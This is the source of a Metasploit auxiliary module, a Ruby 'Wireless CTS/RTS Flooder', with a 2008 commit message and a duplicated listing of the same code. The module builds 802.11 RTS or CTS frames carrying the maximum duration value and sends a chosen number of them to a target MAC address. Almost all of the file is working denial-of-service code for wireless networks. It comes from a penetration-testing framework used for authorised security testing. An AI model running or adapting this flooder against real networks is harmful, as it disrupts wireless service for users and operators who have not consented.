metasploit-framework/modules/auxiliary/dos/wireless/cts_rts_flood.rb

require 'msf/core'

module Msf
class Auxiliary::Dos::Wireless::CTSRTSFLOOD < Msf::Auxiliary

	include Exploit::Lorcon

	def initialize(info ={})
		super(update_info(info,
			'Name'		=> 'Wireless CTS/RTS Flooder',
			'Description' 	=> %q{
	      				This module sends 802.11 CTS/RTS requests to a specific wireless peer,
					using the specified source address,	
					},
			
			'Author'	=> [ 'Brad Antoniewicz' ],
			'License'	=> MSF_LICENSE,
			'Version'	=> '$Revision$'
				 ))
		register_options(
			[
				OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
				OptString.new('ADDR_SRC',[false, "Source MAC (not needed for CTS)"]),
				OptString.new('TYPE',[true,"Type of Frame (RTS, CTS)",'RTS']),
				OptString.new('NUM',[false, "Number of frames to send",'100'])
			],self.class)
	end

	def run
		case datastore['TYPE'].upcase
			when 'RTS'
				if (!datastore['ADDR_SRC'])
					print_status("FAILED: RTS Flood selected but ADDR_SRC not set!")
					return
				end
				frame = create_rts()
			when 'CTS'

				frame =create_cts()
			else 
				print_status("No TYPE selected!!")
				return	
		end
	
		open_wifi	
		print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frame.....")

		0.upto(datastore['NUM'].to_i) do
			wifi.write(frame)
		end

	end	
	def create_rts
		
		frame =
			"\xb4" +			# Type/SubType
			"\x00" +			# Flags
			"\xff\x7f" +			# Duration
			eton(datastore['ADDR_DST']) +	# dst addr
			eton(datastore['ADDR_SRC'])	# src addr

		return frame
	end
	def create_cts
		
		frame = 
			"\xc4" +			# Type/SubType
			"\x00" +			# Flags
			"\xff\x7f" +			# Duration
			eton(datastore['ADDR_DST'])	# dst addr

	     return frame
	end
end
end
Add the CTS/RTS and DEAUTH modules. Improve HTTP capture module error handling git-svn-id: file:///home/svn/framework3/trunk@5483 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-21 05:41:53 +00:00			`require 'msf/core'`

			`module Msf`
			`class Auxiliary::Dos::Wireless::CTSRTSFLOOD < Msf::Auxiliary`

			`include Exploit::Lorcon`

			`def initialize(info ={})`
			`super(update_info(info,`
			`'Name' => 'Wireless CTS/RTS Flooder',`
			`'Description' => %q{`
			`This module sends 802.11 CTS/RTS requests to a specific wireless peer,`
			`using the specified source address,`
			`},`

			`'Author' => [ 'Brad Antoniewicz' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$'`
			`))`
			`register_options(`
			`[`
			`OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),`
			`OptString.new('ADDR_SRC',[false, "Source MAC (not needed for CTS)"]),`
			`OptString.new('TYPE',[true,"Type of Frame (RTS, CTS)",'RTS']),`
			`OptString.new('NUM',[false, "Number of frames to send",'100'])`
			`],self.class)`
			`end`

			`def run`
			`case datastore['TYPE'].upcase`
			`when 'RTS'`
			`if (!datastore['ADDR_SRC'])`
			`print_status("FAILED: RTS Flood selected but ADDR_SRC not set!")`
			`return`
			`end`
			`frame = create_rts()`
			`when 'CTS'`

			`frame =create_cts()`
			`else`
			`print_status("No TYPE selected!!")`
			`return`
			`end`

			`open_wifi`
			`print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frame.....")`

			`0.upto(datastore['NUM'].to_i) do`
			`wifi.write(frame)`
			`end`

			`end`
			`def create_rts`

			`frame =`
			`"\xb4" + # Type/SubType`
			`"\x00" + # Flags`
			`"\xff\x7f" + # Duration`
			`eton(datastore['ADDR_DST']) + # dst addr`
			`eton(datastore['ADDR_SRC']) # src addr`

			`return frame`
			`end`
			`def create_cts`

			`frame =`
			`"\xc4" + # Type/SubType`
			`"\x00" + # Flags`
			`"\xff\x7f" + # Duration`
			`eton(datastore['ADDR_DST']) # dst addr`

			`return frame`
			`end`
			`end`
			`end`